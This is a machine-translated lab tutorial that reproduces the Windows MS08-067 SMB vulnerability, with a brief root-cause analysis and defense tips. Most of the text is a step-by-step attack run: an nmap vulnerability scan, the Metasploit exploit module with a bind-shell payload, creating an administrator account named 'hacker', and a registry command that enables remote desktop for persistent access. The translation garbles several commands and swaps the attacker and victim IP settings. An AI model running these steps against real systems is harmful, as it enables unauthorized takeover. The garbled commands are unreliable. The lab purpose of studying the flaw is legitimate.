Abstract: This paper introduces ms08-067 Remote code execution vulnerability (CVE-2008-4250) and its defense process in detail.

This article is shared by Huawei Cloud community “Windows Vulnerability exploit MS08-067 Remote Code Execution Vulnerability Recurrence and Defense in Depth” by Eastmount.

I. Vulnerability description

Ms08-067 vulnerability is called “Windows Server RPC Request Buffer Overflow Vulnerability”. Attackers send special Remote Procedure Call (RPC) requests by using SMB service port 445, which is open by default on the victim host. Causes stack buffer memory errors that can be exploited for remote code execution.

The vulnerability allows code to be executed remotely when a user receives an RPC request on an affected system, allowing an attacker to run arbitrary code without authentication. At the same time, the vulnerability can be used for worm attacks. It affects some older versions of Windows, including:

  • Windows 2000

  • Windows XP

  • Windows Server 2003

Principle of vulnerability:

The MS08-067 vulnerability is triggered when the NEtPathCanonicalize function in a Server program is called through the MSRPC over SMB channel. A stack buffer memory overflow occurred in NetpwPathCanonicalize, which calls NetpwPathCanonicalize when accessing another host remotely. The result can be used to perform Remote Code Execution. In the following part, I will analyze the CFG flow chart of the vulnerability and the cause of the vulnerability.

This article referred to a lot of big guy’s article, thank them again. The experiment is based on my own practice and experience. If there are mistakes or deficiencies, please also criticize and correct them.

2. Environment building

1. Environment preparation

  • Victim vm: Windows XP SP1 image

  • Attack aircraft: Kali system

Step 1 Install Windows XP SP1 and Kali on the VM.

Second, the two virtual machine systems can communicate with each other.

  • Kali: 192.168.44.136

  • Windows XP: 192.168.44.135

Step 3: Open Windows XP and make sure port 445 is enabled. As shown in the following figure, enter netstat -sn in the CMD of Win XP to check whether port 445 is enabled.

Step 4: Disable the firewall on Windows XP.

After these initial preparations, we started to reproduce the vulnerability using the Kali system.

2. Port details

Here the author adds some basic knowledge of ports, which is more conducive to our Web penetration experiment.

(1) Port functions

As we know, a host with an IP address can provide many services, such as Web services, FTP services, SMTP services, and so on. These services can be realized by using only one IP address. So how do hosts differentiate between different network services? You cannot rely only on IP addresses, because the relationship between IP addresses and network services is one-to-many. In fact, IP addresses and port numbers are used to distinguish different services.

It is important to note that ports are not one-to-one. For example, when your computer accesses a WWW server as a client, the WWW server uses port “80” to communicate with your computer, but your computer might use port “3456”. As shown below:

(2) Classification of ports

The number of ports ranges from 1 to 65535. Well-known ports range from 0 to 1023. These ports are usually assigned to some services and should not be used. For example, port 21 is assigned to the FTP service, port 25 to the SMTP mail transfer protocol service, port 80 to the HTTP service, port 135 to the RPC remote procedure call service, and so on.

Dynamic ports range from 1024 to 65535. These ports are usually not assigned to a single service, which means that many services can use these ports. As long as the running program requests access to the network, the system can allocate one of these port numbers for the program to use. For example, port 1024 is allocated to the first application to the system. After closing the application process, the occupied port number will be released. Note that port collisions do not work properly.

At the same time, dynamic port numbers are often used by virus Trojan programs, such as the glacier default connection port number is 7626, WAY 2.4 connection port number is 8011, Netspy 3.0 connection port number is 7306, YAI virus connection port number is 1024 and so on.

(3) Common ports

**(4) What can a hacker do through a port **

  • Information collection

  • Target detection

  • Service to judge

  • System to judge

  • Role analysis

(5) port 445

Childe Xie is in the”Ports 135, 137, 138, 139, and 445These ports, described in this article, are related to file sharing and printer sharing, and they often have serious vulnerabilities. For example, eternal Blue, which hit the world in 2017, uses port 445.

Port 445 in this article is a file sharing and print sharing service using the Server Message Block (SMB) Windows protocol family. 445 ports is a mixed, with it we can easy access to all kinds of the Shared folder in the local area network (LAN) or a Shared printer, but it was also because of it, hackers have just had an opportunity, they can pass the port secretly sharing your hard drive, and even in the heart of the silent format your hard drive away!

In short, opening ports 139 and 445 on a public server is a very dangerous thing to do. If you have a Guest account and do not set any password, you can easily steal files through the Internet. If you give this account write permission, you can even tamper with files easily. This means that these ports should not be opened on servers that are exposed to the outside world. Using a file server over the Internet is suicidal, so be sure to turn off ports 139 and 445. The same can be said for client machines that are permanently connected to the Internet using ADSL.

3. Use Metasploit recurrence vulnerability

  • Attack aircraft: Kali-192.168.44.136

  • Victim: Win XP-192.168.44.135

The first step is to use the Nmap tool to scan ports and confirm whether the vulnerability exists.

Nmap-n-p 445 --script smb-vuln-MS08-067 192.168.44.135 --openCopy the code

The directory of the nmap missing scan script is /usr/share/nmap/script/, as shown in the following figure. The result is VULNERABLE, indicating that ms0808-067 vulnerability exists and can be exploited.

Alternatively, run the nmap-sv-pn 192.168.44.135 command to view the open ports of the target host. Ports 135, 139, 445, 1025, and 5000 are open on the target computer, and the target computer runs Windows XP. As hackers, when we see port 445 open on XP or 2003, we think of the blockbuster MS08-067.

Nmap - sV - Pn 192.168.44.135Copy the code

** Step 2, go to Msfconsole and use the search statement to find the exploit module. ** Enter MSfConsole in the terminal to open the Metasploite command line client, and use the search command to find the vulnerability exploiting module of MS08-067.

msfconsole
search ms08-067
Copy the code

** Step 3, enter the vulnerability module and view the relevant instructions. ** Use the use command to select the exploit module we want to use. Target Is set to automatic target by default. To accurately target, you can show targets to view all the targets and then select the target.

use exploit/windows/smb/ms08_067_netapi
show options
show targets
Copy the code

The fourth step, set the information of attack aircraft and victim aircraft.

Payload payload generic/ shell_bind_TCP attack plane IP set LHOST 192.168.44.135 port number set RPORT 445 192.168.44.136 # set target 0 # Show optionsCopy the code

** Step 5, run the Exploit rebound shell. ** Now we have successfully obtained the Shell of Windows XP system, and the IP address we call “ipconfig” to check is also the target “192.168.44.135”.

exploit
session 1
ipconfig
pwd
Copy the code

Note: For Windows XP SP1, ms08_067_netAPI_SER2003_zh.rb needs to be processed.

Ms08-067 Remote execution code vulnerability reoccurrence – Feizianquan

Step 6: Create folders and files on the target host.

cd .. Echo eastmount>test.txtCopy the code

The result is as follows:

The seventh step, the target XP host depth weight.

Net user hacker 123456 /add net localGroup Administrators hacker /addCopy the code

Common commands for Windows DOM users are as follows:

  • net user abcd 1234 /add

Create an account with user name abcd and password 1234. The default account is a member of group user

  • net user abcd /del

Example Delete user abcd

  • net user abcd /active:no

Example Disable user abcd

  • net user abcd /active:yes

Example Activate user abcd

  • net user abcd

View the information about user abcd

  • net localgroup administrators abcd /add

Give administrator privileges to the ABcd account

The host under attack has a new hacker administrator as shown in the following figure:

Step 8: Enable remote connection to port 3389 and perform remote operation.

Echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\ System32 \3389.bat && call 3389.bat 192.168.44.135Copy the code

Port 3389 is not enabled on the target host Windows XP.

Enter the command to enable the remote connection port.

Then type “rdesktop 192.168.44.135” to connect to the remote IP address and enter the hacker username and password we created.

Enter the username hacker and password 123456 and press Enter. In the pop-up dialog box, click OK.

Finally, we need to remove the new user name hacker. So that’s the end of the experiment.

4. Analysis of common errors and loopholes

Common mistakes

We sometimes have related errors when running the Exploit execution vulnerability exploit module. For example, “Exploit completed,but no session was created” or “ConnectionRefused the connection was refused by the remote host” is displayed. Note:

  • Disable the firewall on Windows XP

  • Bug unstable try a few more times

Sometimes XP will prompt the “Generic Host Process for Win32 Services” error. This is svchost.exe error caused by memory overflow.

Finally, the author solved the problem that XP could not lift loads. When I called “show payloads” to set attack loads, I would get an error when I used “set payload generic/ shell_reverse_TCP”. Finally, I changed Payload to set Payload generic/shell_bind_tcp.

  • Failed to bounce shell: set payload generic/ shell_reverse_TCP

  • Echo shell succeeds: set payload generic/ shell_bind_TCP

If it still fails, you may need to switch to another XP or 2003 system to try. Good luck ~

2. Causes of vulnerabilities

If you want to understand the principle of this vulnerability, the following three articles are recommended. The subsequent authors also need to analyze the original code of various vulnerabilities in depth.

www.cnblogs.com/justforfun1…

Bbs.pediy.com/thread-2512…

www.freebuf.com/vuls/203881…

The MS08-067 vulnerability is triggered when the NetPathCanonicalize function in the Server Server program is called through the MSRPC over SMB channel, and when the NetPathCanonicalize function remotely accesses other hosts, The NetpwPathCanonicalize function is called to normalize the path to remote access, and a stack buffer memory error occurred in the NetpwPathCanonicalize function, causing it to be used for remote code execution.

The so-called path normalization is to convert the [/] in the path string to [\], while removing the relative paths [.\] and [..\]. **/*/./** => ** ** * ** ** ** *.. \ \ = > * * * * * *Copy the code

In the operation of path normalization, the server has a logical flaw in checking the address space of the path string. By carefully designing the input path, the attacker can copy the contents of the path string to the address space (low address) before the path string when the function removes the [… \] string, so as to overwrite the return address of the function and execute arbitrary code.

Here open c:\ Windows \ System32\ netapi32.dll via IDA Pro, find the NetpwPathCanonicalize function where the vulnerability is located and double-click it. By observing its flow chart CFG, it can be seen that this function does not directly input path and normalization, but calls the subordinate function CanonicalizePathName for path sorting, normalizes the path string to be sorted, and then saves it to the pre-allocated output path buffer. The end result is a buffer overflow vulnerability.

In live.

Through this experiment, we reproduce the MS08-067 remote code execution vulnerability, involving the complete process of vulnerability discovery, verification and exploitation, and use Metasploit tool for shell rebound and in-depth understanding, hoping to help you. How to defend against it? On the one hand, close the relevant ports, install anti-virus software and patches, on the other hand, carry out traffic monitoring in the firewall, mainly for the data packets in the form of such as “\ ** \… \… The safest way to detect malicious pathnames like \ *” is to use pcRE re to match.

Complete commands for this experiment:

Msfconsole: ms08-067: msfConsole: ms08-067: msfConsole: ms08-067: msfConsole: ms08-067: msFConsole: ms08-067: msFConsole: ms08-067: msFConsole: ms08-067: msFConsole: ms08-067: msFConsole: ms08-067 Exploit/Windows/SMB/MS08_067_netAPI show options show targets # Set related configuration information set RHOST 192.168.44.135 set RPORT 445 set Payload generic/shell_bind_tcp set LHOST 192.168.44.136 set target 0 show options # rebound shell exploit session 1 ipconfig PWD # Target host file operation CD.. Mkdir hacker dir CD hacker echo eastmount>test.txt sysinfo administrators hacker /add echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat netstat -an rdesktop 192.168.44.135Copy the code

Click to follow, the first time to learn about Huawei cloud fresh technology ~